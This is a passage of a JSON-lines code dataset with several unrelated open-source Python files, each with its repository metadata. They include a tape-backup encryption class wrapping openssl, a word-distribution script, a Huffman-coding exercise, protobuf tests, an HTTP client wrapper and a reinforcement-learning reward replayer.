here is meaningless)\n w, f, e = self.beam.beam.optimal_extract(self.beam.model , bin=0)\n\n ifl = interp1d(w, f)(self.gal_wv)\n \n C = Scale_model(self.gal_fl, self.gal_er, ifl / self.filt)\n\n self.fl = C * ifl / self.filt","repo_name":"Vince-ec/grizli_sim_tutorial","sub_path":"sim_tools.py","file_name":"sim_tools.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17477399872","text":"import logging\nimport datetime\nimport subprocess\nimport os\nimport sys\nimport time\nimport threading\nfrom lib import database\nfrom pathlib import Path\n\nlogger = logging.getLogger()\n\n\nclass Encryption:\n def __init__(self, config, engine, tapelibrary, tools, local=False):\n self.config = config\n self.engine = engine\n self.session = database.create_session(engine)\n self.tapelibrary = tapelibrary\n self.tools = tools\n self.local_files = local\n self.interrupted = False\n self.active_threads = []\n\n def set_interrupted(self):\n self.interrupted = True\n\n def encrypt_single_file_thread(self, threadnr, id, filepath, filename_enc):\n thread_session = database.create_session(self.engine)\n file = database.update_filename_enc(thread_session, id, filename_enc)\n\n time_started = time.time()\n\n if not self.local_files:\n command = ['openssl', 'enc', '-aes-256-cbc', '-pbkdf2', '-iter', '100000', '-in',\n os.path.abspath(f\"{self.config['local-data-dir']}/{filepath}\"), '-out',\n os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"), '-k',\n self.config['enc-key']]\n else:\n command = ['openssl', 'enc', '-aes-256-cbc', '-pbkdf2', '-iter', '100000', '-in',\n os.path.abspath(f\"{self.config['local-base-dir']}/{filepath}\"), '-out',\n os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"), '-k',\n self.config['enc-key']]\n openssl = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=os.setpgrp)\n\n if openssl.returncode == 0:\n logger.debug(f\"Execution Time: Encrypt file with openssl: {time.time() - time_started} seconds\")\n\n time_started = time.time()\n md5 = self.tools.md5sum(os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"))\n logger.debug(f\"Execution Time: md5sum encrypted file: {time.time() - time_started} seconds\")\n\n filesize = os.path.getsize(os.path.abspath(f\"{self.config['local-enc-dir']}/{filename_enc}\"))\n encrypted_date = datetime.datetime.now()\n database.update_file_after_encrypt(thread_session, file, filesize, encrypted_date, md5)\n\n if not self.local_files:\n time_started = time.time()\n os.remove(os.path.abspath(f\"{self.config['local-data-dir']}/{filepath}\"))\n logger.debug(f\"Execution Time: Remove file after encryption: {time.time() - time_started} seconds\")\n else:\n logger.warning(f\"encrypt file failed, file: {id} error: {openssl.stderr}\")\n logger.debug(f\"Execution Time: Encrypt file with openssl: {time.time() - time_started} seconds\")\n\n self.active_threads.remove(threadnr)\n thread_session.close()\n\n def encrypt(self):\n logger.info(\"Starting encrypt files job\")\n\n while True:\n files = database.get_files_to_be_encrypted(self.session)\n\n if len(files) == 0:\n break\n\n file_count_total = len(files)\n file_count_current = 0\n\n for file in files:\n file_count_current += 1\n for i in range(0, self.config['threads']['encrypt']):\n if i not in self.active_threads:\n next_thread = i\n break\n\n logger.info(f\"Starting Thread #{next_thread}, processing 
({file_count_current}/{file_count_total}): \"\n f\"id: {file.id}, filename: {file.filename}\")\n\n filename_enc = self.tools.create_filename_encrypted()\n while database.filename_encrypted_already_used(self.session, filename_enc):\n logger.warning(f\"Filename ({filename_enc}) encrypted already exists, creating new one!\")\n filename_enc = self.tools.create_filename_encrypted()\n\n self.active_threads.append(next_thread)\n x = threading.Thread(target=self.encrypt_single_file_thread,\n args=(next_thread, file.id, file.path, filename_enc,),\n daemon=True)\n x.start()\n\n while threading.active_count() > self.config['threads']['encrypt']:\n time.sleep(0.2)\n\n if self.interrupted:\n while threading.active_count() > 1:\n time.sleep(1)\n break\n\n if self.interrupted:\n while threading.active_count() > 1:\n time.sleep(1)\n break\n\n ## Multithreading fix: Wait for all threads to finish, otherwise one file get encrypted twice!\n while threading.active_count() > 1:\n time.sleep(1)\n\n # src relative to tape, dst relative to restore-dir\n def decrypt_relative(self, src, dst, mkdir=False):\n if 'restore-dir' not in self.config:\n logging.error('\"restore-dir\" not configured')\n sys.exit(1)\n restore_dir = Path(self.config['restore-dir'])\n\n if not restore_dir.is_dir():\n logging.error(f'restore directory \"{restore_dir}\" does not exist or is not a directory')\n sys.exit(1)\n\n src_path = Path(self.config['local-tape-mount-dir']) / src\n dst_path = restore_dir / dst\n\n if mkdir:\n dst_path.parent.mkdir(parents=True, exist_ok=True)\n\n return self.decrypt(src_path.resolve(), dst_path.resolve())\n\n def decrypt(self, src, dst):\n if not isinstance(dst, Path):\n dst = Path(dst)\n if dst.is_file():\n logger.error(f'File {dst} already exists, skipping decrypt')\n return True\n\n openssl = [\n 'openssl', 'enc', '-d', '-aes-256-cbc', '-pbkdf2', '-iter', '100000',\n '-in', str(src), '-out', str(dst), '-k', self.config['enc-key']\n ]\n\n try:\n subprocess.check_output(openssl, stderr=subprocess.STDOUT, preexec_fn=os.setpgrp)\n return True\n except subprocess.CalledProcessError as e:\n logging.error(f'Decryption failed: {e.stdout.decode(\"utf-8\").splitlines()[0]}')\n if dst.is_file() and dst.stat().st_size == 0:\n dst.unlink()\n return False\n\n## encrypt\n# openssl enc -aes-256-cbc -pbkdf2 -iter 100000 -in 'videofile.mp4' -out test.enc -k supersicherespasswort\n## decrypt\n# openssl enc -d -aes-256-cbc -pbkdf2 -iter 100000 -in test.enc -out test.mp4\n","repo_name":"birdie1/tapebackup","sub_path":"functions/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"70865848554","text":"import os\nimport argparse\nimport numpy as np\nimport logging\n\nfrom scipy.spatial.distance import jensenshannon\nfrom scipy.stats import entropy\nfrom tqdm import tqdm\nfrom itertools import chain\nfrom multiprocessing.pool import Pool\nfrom gensim.corpora.dictionary import Dictionary\nfrom smart_open import open\n\nfrom word_dist.src.utils.preprocess import get_neighbor_unigram, filter_dict\nfrom word_dist.src.utils.smoothing import dirichlet_smoothing, laplace_smoothing\nfrom word_dist.src.utils.multiprocessing import generate_batch_dataset, reduce_results\nfrom word_dist.src.utils.env import ROOT_DIR\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\nparser = argparse.ArgumentParser(description='Word 
Distribution')\nparser.add_argument('--dataset', type=str, default='clean_clean', help='dataset name')\nparser.add_argument('--dark_file', type=str, default='dark.txt', help='dark file name from which you want to calculate word distribution')\nparser.add_argument('--clean_file', type=str, default='clean.txt', help='clean file name from which you want to calculate word distribution')\nparser.add_argument('--num_neighbors', type=int, default=10, help='the number of left/right neighbors sampled for each neighbor')\nparser.add_argument('--vocab_size', type=int, default=10000, help='how many most common/random word you want')\nparser.add_argument('--alpha', type=float, default=1.0, help='laplace smoothing factor')\nparser.add_argument('--mu', type=int, default=2000, help='dirichlet smoothing factor')\nparser.add_argument('--smoothing', type=str, default='', help='smoothing method to use, choose from: \"laplace\", \"dirichlet\"')\nparser.add_argument('--batch_size', type=int, default=100, help='batch size for multiprocessing')\nargs = parser.parse_args()\n\n\ndef calc_distance(data):\n distances = []\n for dist_dark, unigram_clean in data:\n row = []\n for col, dist_clean in enumerate(unigram_clean):\n row.append(distance_fcn(dist_dark, dist_clean))\n distances.append(row)\n return distances\n\n\ndef get_keep_tokens(dictionary):\n sim_dark_term_mapping = {word[1:]: word for word in dictionary.itervalues() if word.startswith('_')}\n keep_tokens = list(chain(sim_dark_term_mapping.values(), sim_dark_term_mapping.keys()))\n return keep_tokens\n\n\nif __name__ == '__main__':\n data_path = os.path.join(ROOT_DIR, \"data\", args.dataset)\n output_path = os.path.join(data_path, 'distribution', args.dataset)\n os.makedirs(output_path, exist_ok=True)\n\n data_dark_file = os.path.join(data_path, args.dark_file)\n data_clean_file = os.path.join(data_path, args.clean_file)\n \n if args.smoothing == 'laplace':\n output_file_dist = os.path.join(output_path, f'distance_{args.smoothing}_{args.alpha}')\n elif args.smoothing == 'dirichlet':\n output_file_dist = os.path.join(output_path, f'distance_{args.smoothing}_{args.mu}')\n else:\n output_file_dist = os.path.join(output_path, 'distance_js')\n\n dict_file = os.path.join(data_path, 'dict_all.model')\n\n file_unigram_dark = os.path.join(output_path, 'unigram_dark.npy')\n file_unigram_clean = os.path.join(output_path, 'unigram_clean.npy')\n file_unigram_dark_all = os.path.join(output_path, 'unigram_dark_all.npy')\n file_unigram_clean_all = os.path.join(output_path, 'unigram_clean_all.npy')\n\n if os.path.exists(dict_file) and os.path.exists(file_unigram_dark)\\\n and os.path.exists(file_unigram_clean) and os.path.exists(file_unigram_dark_all) \\\n and os.path.exists(file_unigram_clean_all):\n logging.info('loading precalculated results...')\n unigram_dark = np.load(file_unigram_dark)\n unigram_clean = np.load(file_unigram_clean)\n unigram_dark_all = np.load(file_unigram_dark_all)\n unigram_clean_all = np.load(file_unigram_clean_all)\n\n dictionary = Dictionary.load(dict_file)\n dictionary = filter_dict(args.vocab_size, dictionary, get_keep_tokens(dictionary))\n\n else:\n logging.info('no calculated files found, recomputing...')\n logging.info('loading files...')\n with open(data_dark_file, 'r') as f1, open(data_clean_file, 'r') as f2:\n logging.info('loading dark text...')\n dark_text = [line.split() for line in f1.readlines()]\n logging.info('loading clean text...')\n clean_text = [line.split() for line in f2.readlines()]\n logging.info('load file done')\n\n if 
os.path.exists(dict_file):\n dictionary = Dictionary.load(dict_file)\n else:\n logging.info('creating the dictionary...')\n dictionary = Dictionary(dark_text)\n dictionary.add_documents(clean_text)\n dictionary.save(dict_file)\n\n dictionary = filter_dict(args.vocab_size, dictionary, get_keep_tokens(dictionary))\n logging.info('dictionary created')\n\n logging.info('building neighbor unigrams...')\n\n if os.path.exists(file_unigram_dark) and os.path.exists(file_unigram_dark_all):\n unigram_dark = np.load(file_unigram_dark)\n unigram_dark_all = np.load(file_unigram_dark_all)\n else:\n unigram_dark, unigram_dark_all = get_neighbor_unigram(dictionary, dark_text, args.num_neighbors)\n np.save(file_unigram_dark, unigram_dark)\n np.save(file_unigram_dark_all, unigram_dark_all)\n\n if os.path.exists(file_unigram_clean) and os.path.exists(file_unigram_clean_all):\n unigram_clean = np.load(file_unigram_clean)\n unigram_clean_all = np.load(file_unigram_clean_all)\n else:\n unigram_clean, unigram_clean_all = get_neighbor_unigram(dictionary, clean_text, args.num_neighbors)\n np.save(file_unigram_clean, unigram_clean)\n np.save(file_unigram_clean_all, unigram_clean_all)\n\n logging.info('neighbor unigrams built')\n\n if args.smoothing == 'laplace':\n unigram_dark = laplace_smoothing(unigram_dark, args.alpha)\n unigram_clean = laplace_smoothing(unigram_clean, args.alpha)\n distance_fcn = entropy\n distance_fcn_name = 'kl'\n elif args.smoothing == 'dirichlet':\n unigram_dark = dirichlet_smoothing(unigram_dark, unigram_dark_all, args.mu)\n unigram_clean = dirichlet_smoothing(unigram_clean, unigram_clean_all, args.mu)\n distance_fcn = entropy\n distance_fcn_name = 'kl'\n else:\n distance_fcn = jensenshannon\n distance_fcn_name = 'js'\n\n logging.info(f'calculating distance of two distributions using {distance_fcn_name}-divergence(dark-clean)')\n dataset = generate_batch_dataset(args.batch_size, unigram_dark, unigram_clean)\n\n with Pool() as pool:\n results = list(tqdm(pool.imap(calc_distance, dataset), total=len(dataset)))\n\n logging.info(f'Batches processed: {len(results)}')\n\n distance = reduce_results(results, vocab_size=len(dictionary))\n\n logging.info('distance calculated')\n np.save(output_file_dist, distance)\n","repo_name":"dom-s/dark-jargon","sub_path":"word_dist/src/commands/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27852778297","text":"import sys,collections;\nn,m = map(int,sys.stdin.readline().split())\nboard = [list(sys.stdin.readline().strip()) for _ in range(n)]\nvisited = [[False] * m for _ in range(n)]\ndx = [0,0,-1,1] ; dy = [-1,1,0,0]\n\ndef bfs(i,j) :\n q = collections.deque([[i,j]])\n visited[i][j] = True\n while q :\n x,y = q.popleft()\n for i in range(4) :\n nx,ny = x + dx[i], y + dy[i]\n\n if board[nx][ny] == \"#\" : continue\n if board[nx][ny] == '.' 
and not visited[nx][ny] :\n                visited[nx][ny] = True ;q.append([nx,ny])\n            if board[nx][ny] == \"+\" :\n                while 1 :\n                    nx += dx[i] ; ny += dy[i]\n                    if board[nx][ny] == \"#\" :\n                        nx -= dx[i] ; ny -= dy[i] ;break\n                    elif board[nx][ny] == \".\" : break\n                    elif board[nx][ny] == \"+\" : continue\n                if not visited[nx][ny] :\n                    visited[nx][ny] = True ; q.append([nx,ny])\n\nfor i in range(n) :\n    for j in range(m) :\n        if board[i][j] == \"W\" and not visited[i][j] :\n            bfs(i,j)\n\nfor i in range(n) :\n    for j in range(m) :\n        if visited[i][j] :\n            print(board[i][j] , end = \"\")\n        else :\n            if board[i][j] == '.' :\n                print(\"P\",end = \"\")\n            else :\n                print(board[i][j], end = \"\")\n    print()","repo_name":"parksangji/PS_python3","sub_path":"0스터디0506-0513/3.16441(bfs_반례찾기애매).py","file_name":"3.16441(bfs_반례찾기애매).py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"41595038907","text":"# Huffman coding\n# Specification:\n# Input:\n# tekst - a string of lowercase letters\n# Output:\n# The code of every letter occurring in the text\n# The encoded input text\n# The compression ratio\n\n# General outline of the algorithm:\n# 1. Build pairs: (character, number of occurrences)\n# 2. Build the coding tree: start by merging the least frequent characters\n# 3. Read the codes off the tree: going left appends 0, going right appends 1\n# 4. Use the codes to encode the text\n\nclass Wezel:\n    znak = \"\"\n    czestosc = 0\n    lewy = None\n    prawy = None\n\n    def __init__(self, znak, czestosc, lewy, prawy):\n        self.znak = znak\n        self.czestosc = czestosc\n        self.lewy = lewy\n        self.prawy = prawy\n\n    def wypisz(self, kod):\n        if self.lewy is None:\n            print(self.znak, kod)\n            return\n\n        self.lewy.wypisz(kod + \"0\")\n        self.prawy.wypisz(kod + \"1\")\n\n\ndef sort_wezel(wezel):\n    return wezel.czestosc\n\ntekst = \"aaaabbaabbaaacccaaaabbaaaaccdddaaaaaaeee\"\n\nczestosci = dict()\n\nfor znak in tekst:\n    # If the character is already in the dictionary\n    if znak in czestosci:\n        czestosci[znak] += 1\n    else:\n        czestosci[znak] = 1\n\n# List holding the tree nodes\nelementy = []\n\nfor znak in czestosci:\n    w = Wezel(znak, czestosci[znak], None, None)\n    elementy.append(w)\n\nelementy.sort(key=sort_wezel)\n\n# for el in elementy:\n#     print(el.znak, el.czestosc)\n\nwhile len(elementy) > 1:\n    w1 = elementy[0]\n    w2 = elementy[1]\n    # Remove the first two elements\n    elementy.pop(0)\n    elementy.pop(0)\n    w3 = Wezel(\"\", w1.czestosc + w2.czestosc, w2, w1)\n    elementy.append(w3)\n    elementy.sort(key=sort_wezel)\n\nkorzen = elementy[0]\nkorzen.wypisz(\"\")","repo_name":"blackbat13/matura_inf","sub_path":"algorytmy/kodowanie_huffmana.py","file_name":"kodowanie_huffmana.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"22053859218","text":"\"\"\"\nTests for descriptor_to_message_class\n\"\"\"\n\n# Standard\nimport os\nimport tempfile\n\n# Third Party\nfrom google.protobuf import message\nfrom google.protobuf.internal.enum_type_wrapper import EnumTypeWrapper\n\n# Local\nfrom .conftest import temp_dpool\nfrom py_to_proto.descriptor_to_message_class import descriptor_to_message_class\nfrom py_to_proto.jtd_to_proto import jtd_to_proto\n\n\ndef test_descriptor_to_message_class_generated_descriptor(temp_dpool):\n    \"\"\"Make sure that a generated descriptor can be used to create a class\"\"\"\n    descriptor = jtd_to_proto(\n        \"Foo\",\n        \"foo.bar\",\n        {\n            \"properties\": {\n                \"foo\": 
{\"type\": \"boolean\"},\n \"bar\": {\"type\": \"float32\"},\n }\n },\n descriptor_pool=temp_dpool,\n )\n Foo = descriptor_to_message_class(descriptor)\n assert issubclass(Foo, message.Message)\n foo = Foo(foo=True, bar=1.234)\n assert foo.foo is True\n assert foo.bar is not None # NOTE: There are precision errors comparing == 1.234\n\n # Make sure the class can be serialized\n serialized_content = Foo.to_proto_file()\n assert \"message Foo\" in serialized_content\n\n\ndef test_descriptor_to_message_class_write_proto_file(temp_dpool):\n \"\"\"Make sure that each message class has write_proto_files attached to it\n and that it correctly writes the protobufs to the right named files.\n \"\"\"\n Foo = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Foo\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"foo\": {\n \"type\": \"boolean\",\n },\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n\n Bar = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Bar\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"bar\": {\n \"type\": Foo.DESCRIPTOR,\n },\n },\n },\n descriptor_pool=temp_dpool,\n ),\n )\n\n with tempfile.TemporaryDirectory() as workdir:\n Foo.write_proto_file(workdir)\n Bar.write_proto_file(workdir)\n assert set(os.listdir(workdir)) == {\n Foo.DESCRIPTOR.file.name,\n Bar.DESCRIPTOR.file.name,\n }\n with open(os.path.join(workdir, Bar.DESCRIPTOR.file.name), \"r\") as handle:\n bar_content = handle.read()\n assert f'import \"{Foo.DESCRIPTOR.file.name}\"' in bar_content\n\n\ndef test_descriptor_to_message_class_write_proto_file_no_dir(temp_dpool):\n \"\"\"Make sure that each message class has write_proto_files attached to it\n and that it correctly writes the protobufs to the right named files.\n Also ensures that the directory gets created if it doesn't exist\n \"\"\"\n Foo = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Foo\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"foo\": {\n \"type\": \"boolean\",\n },\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n\n with tempfile.TemporaryDirectory() as workdir:\n protos_dir_path = os.path.join(workdir, \"protos\")\n Foo.write_proto_file(protos_dir_path)\n assert set(os.listdir(protos_dir_path)) == {\n Foo.DESCRIPTOR.file.name,\n }\n\n\ndef test_descriptor_to_message_class_nested_messages(temp_dpool):\n \"\"\"Make sure that nested messages are wrapped and added to the parents\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"ghost\": {\n \"properties\": {\n \"boo\": {\n \"type\": \"string\",\n }\n }\n }\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n assert issubclass(top, message.Message)\n assert issubclass(top.Ghost, message.Message)\n\n\ndef test_descriptor_to_message_class_nested_enums(temp_dpool):\n \"\"\"Make sure that nested enums are wrapped and added to the parents\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\n \"properties\": {\n \"bat\": {\n \"enum\": [\"VAMPIRE\", \"BASEBALL\"],\n }\n }\n },\n descriptor_pool=temp_dpool,\n )\n )\n assert issubclass(top, message.Message)\n assert isinstance(top.Bat, EnumTypeWrapper)\n\n\ndef test_descriptor_to_message_class_top_level_enum(temp_dpool):\n \"\"\"Make sure that a top-level EnumDescriptor results in an EnumTypeWrapper\"\"\"\n top = descriptor_to_message_class(\n jtd_to_proto(\n name=\"Top\",\n package=\"foobar\",\n jtd_def={\"enum\": [\"VAMPIRE\", \"DRACULA\"]},\n descriptor_pool=temp_dpool,\n 
)\n )\n assert isinstance(top, EnumTypeWrapper)\n with tempfile.TemporaryDirectory() as workdir:\n top.write_proto_file(workdir)\n assert os.listdir(workdir) == [top.DESCRIPTOR.file.name]\n\n\ndef test_multiple_invocations_of_descriptor_to_message(temp_dpool):\n \"\"\"Ensure that invoking descriptor_to_message_class with the same descriptor\n returns the same instance of a class.\n \"\"\"\n descriptor = jtd_to_proto(\n \"Foo\",\n \"foo.bar\",\n {\n \"properties\": {\n \"foo\": {\"type\": \"boolean\"},\n \"bar\": {\"type\": \"float32\"},\n }\n },\n descriptor_pool=temp_dpool,\n )\n Foo = descriptor_to_message_class(descriptor)\n foo = Foo(foo=True, bar=1.234)\n\n Bar = descriptor_to_message_class(descriptor)\n bar = Bar(foo=True, bar=1.234)\n\n assert Foo is Bar\n assert Foo == Bar\n assert id(Foo) == id(Bar)\n assert foo == bar\n","repo_name":"IBM/py-to-proto","sub_path":"tests/test_descriptor_to_message_class.py","file_name":"test_descriptor_to_message_class.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"72"} +{"seq_id":"32593072176","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nimport requests\n\nfrom .response_handler import ResponseHandler\nfrom .exceptions import HttpException\n\n\nclass RequestHandler(object):\n\n def __init__(self, base_url):\n self.base_url = base_url\n self.headers = {\n \"Content-Type\": \"application/json\"\n }\n self.__last_response = None\n\n def add_header(self, header, value):\n self.headers[header] = value\n\n def call(self, url, method=\"get\", params=None, json=None, headers=None, output_as_stream=False,\n **kwargs):\n \"\"\"\n\n :param str|unicode url: api address\n :param str|unicode method: http verb - `post`, `get`, `delete`, `put`\n :param dict|None params: dictionary of data\n :param dict|None json: dictionary of body request\n :param dict|None headers: dictionary of headers\n :param bool output_as_stream: output as a stream\n \"\"\"\n base_url = kwargs.pop(\"base_url\", self.base_url)\n\n url = base_url + url\n params = self._prepare_params(params)\n headers = self._prepare_headers(headers)\n if kwargs.get(\"files\", None) is not None:\n headers.pop(\"Content-Type\", \"\")\n\n try:\n method = method.lower()\n if method == \"post\":\n self.__last_response = ResponseHandler(requests.post(url, data=params, json=json, headers=headers,\n **kwargs), stream=output_as_stream)\n elif method == \"put\":\n self.__last_response = ResponseHandler(requests.put(url, data=params, json=json, headers=headers),\n stream=output_as_stream)\n elif method == \"delete\":\n self.__last_response = ResponseHandler(requests.delete(url, headers=headers),\n stream=output_as_stream)\n else:\n self.__last_response = ResponseHandler(requests.get(url, params=params, headers=headers),\n stream=output_as_stream)\n\n return self.__last_response.get_result()\n except requests.exceptions.RequestException as e:\n raise HttpException(e)\n\n def last_response(self):\n \"\"\"\n get last response handler\n\n :return: sakku.response_handler.ResponseHandler\n \"\"\"\n return self.__last_response\n\n @staticmethod\n def _prepare_params(params=None):\n if params is None or type(params) is not dict:\n params = {}\n\n return params\n\n def _prepare_headers(self, headers=None):\n if headers is not None and type(headers) is dict:\n self.headers.update(headers)\n\n return 
self.headers\n","repo_name":"FanapSoft/sakku-python-sdk","sub_path":"sakku/request_handler.py","file_name":"request_handler.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29206467178","text":"import os\nfrom typing import Dict, Optional\n\nimport keyboard\nfrom rlgym.api import AgentID, ObsType, StateType, ActionType, RewardType\nfrom rlviser_py import rlviser_py\n\nfrom rl_state_tester.global_harvesters.callbacks import Callback\nfrom rl_state_tester.global_harvesters.global_harvesters import StateHarvester, RewardHarvester\nfrom rl_state_tester.utils.rewards.common_rewards import SplitCombinedReward\n\n\nclass RewardStateReplayer(Callback):\n\n def __init__(\n self,\n rendered: bool,\n combined_reward: SplitCombinedReward,\n state_harvester: Optional[StateHarvester] = None,\n reward_harvester: Optional[RewardHarvester] = None,\n\n ):\n self.state_harvester = state_harvester\n self.reward_harvester = reward_harvester\n self.current_state_index = 0\n self.nb_episodes = 0\n self.legends = [r.__class__.__name__ for r in combined_reward.reward_fns]\n self.max_len = max([len(name) for name in self.legends])\n self.playing = False\n self.rendered = rendered\n self.combined_reward = combined_reward\n\n if not self.state_harvester:\n self.state_harvester = StateHarvester()\n\n if not self.reward_harvester:\n self.reward_harvester = RewardHarvester()\n\n\n def _on_reset(self, obs: Dict[AgentID, ObsType], state: StateType, *args, **kwargs):\n self.state_harvester.on_reset(obs, state, args, kwargs)\n self.reward_harvester.on_reset(obs, state, args, kwargs)\n\n def _on_step(self,\n obs: Dict[AgentID, ObsType],\n action: Dict[AgentID, ActionType],\n reward: Dict[AgentID, RewardType],\n truncated: Dict[AgentID, bool],\n terminated: Dict[AgentID, bool],\n state: StateType,\n *args, **kwargs):\n self.state_harvester.on_step(obs, action, reward, terminated, truncated, state, args, kwargs)\n self.reward_harvester.on_step(obs, action, reward, terminated, truncated, state, args, kwargs)\n\n def _on_close(self, *args, **kwargs):\n self.state_harvester.on_close(args, kwargs)\n self.reward_harvester.on_close(args, kwargs)\n self._start_rendering()\n\n def _start_rendering(self):\n states = self.state_harvester.get_all_episodes()\n rewards = self.reward_harvester.get_all_rewards()\n\n self.current_state_index = 0\n self.nb_episodes = 0\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n keyboard.on_press_key(\"right arrow\", lambda e: self._step_forward(states, rewards))\n keyboard.on_press_key(\"left arrow\", lambda e: self._step_backward(states, rewards))\n keyboard.on_press_key(\"p\", lambda e: self._play_from_step(states, rewards))\n\n print(\"Waiting for shift...\")\n keyboard.wait(\"shift\")\n\n def _print_rewards(self, state: StateType, rewards):\n for i, name in enumerate(state.cars.keys()):\n print(f\"Player {name}:\")\n\n for j, legend in enumerate(self.legends):\n print(\"\\t\", legend, \":\", rewards[name][j])\n # step = self.combined_reward.steps[i][self.nb_episodes][self.current_state_index] if self.combined_reward.steps[i] is not None else None\n # print(f\"\\t{legend: <{self.max_len}} : {float(rewards[i][j]):3f} \"\n # f\"{((step.value if step.value < 0 else ('+' + step.value)) + ':' + step.reason if isinstance(self.combined_reward.steps[i], list) else 'Nothing') if step else ''}\")\n\n def _step_forward(self, states, rewards):\n 
self.current_state_index += 1\n # Reset\n if states[self.nb_episodes].shape[0] <= self.current_state_index:\n if self.nb_episodes + 2 >= len(states):\n self.current_state_index -= 1\n if self.playing:\n self.playing = False\n return\n\n self.nb_episodes += 1\n self.current_state_index = 0\n print(\"Resetting to first state of next episode\")\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n os.system(\"cls\")\n self._print_rewards(\n states[self.nb_episodes][self.current_state_index],\n rewards[self.nb_episodes][self.current_state_index]\n )\n\n def _step_backward(self, states, rewards):\n self.current_state_index -= 1\n # Reset\n if self.current_state_index < 0:\n if self.nb_episodes <= 0:\n self.current_state_index = 0\n return\n\n self.nb_episodes -= 1\n self.current_state_index = states[self.nb_episodes].shape[0] - 1\n print(\"Resetting to first state of next episode\")\n\n if self.rendered:\n rlviser_py.render_rlgym(states[self.nb_episodes][self.current_state_index])\n\n os.system(\"cls\")\n self._print_rewards(states[self.nb_episodes][self.current_state_index], rewards[self.nb_episodes][self.current_state_index])\n\n def _play_from_step(self, states, rewards):\n if self.playing:\n return\n\n self.playing = True\n while self.playing:\n self._step_forward(states, rewards)\n\n if keyboard.is_pressed(\"s\"):\n self.playing = False\n\n def _stop_playing(self):\n self.playing = False\n","repo_name":"MathieuSuchet/rl-state-tester","sub_path":"rl_state_tester/reward_state_replayer.py","file_name":"reward_state_replayer.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42064301153","text":"import numpy as np\nimport pytest\nfrom airo_spatial_algebra.operations import _HomogeneousPoints, transform_points\nfrom airo_spatial_algebra.se3 import SE3Container\n\n\ndef test_helper_class_creation():\n point = np.array([1.0, 2, 3])\n hpoints = _HomogeneousPoints(point)\n assert hpoints._homogeneous_points.shape == (1, 4)\n assert hpoints._homogeneous_points[0, -1] == 1.0\n\n homogeneous_point = np.array([1, 2, 3, 1])\n with pytest.raises(ValueError):\n _HomogeneousPoints(homogeneous_point)\n\n points = np.arange(6).reshape(2, 3)\n hpoints = _HomogeneousPoints(points)\n assert hpoints._homogeneous_points.shape == (2, 4)\n # check that the scale is 1.0\n assert hpoints._homogeneous_points[0, -1] == 1.0\n\n wronglyshaped_points = np.arange(6).reshape(3, 2)\n with pytest.raises(ValueError):\n _HomogeneousPoints(wronglyshaped_points)\n\n\n@pytest.mark.parametrize(\"points\", [np.arange(6).astype(np.float32).reshape(2, 3), np.array([1.0, 2, 3])])\ndef test_helper_class_properties(points):\n hpoints = _HomogeneousPoints(points)\n assert np.isclose(points, hpoints.points).all()\n assert hpoints.homogeneous_points.shape == (points.size // 3, 4)\n\n\ndef test_transform_points():\n points = np.arange(6).astype(np.float32).reshape(2, 3)\n transform = SE3Container.random()\n transformed_points = transform_points(transform.homogeneous_matrix, points)\n assert np.isclose(transformed_points[0], transform.rotation_matrix @ points[0] + transform.translation).all()\n","repo_name":"airo-ugent/airo-mono","sub_path":"airo-spatial-algebra/test/test_operations.py","file_name":"test_operations.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} 
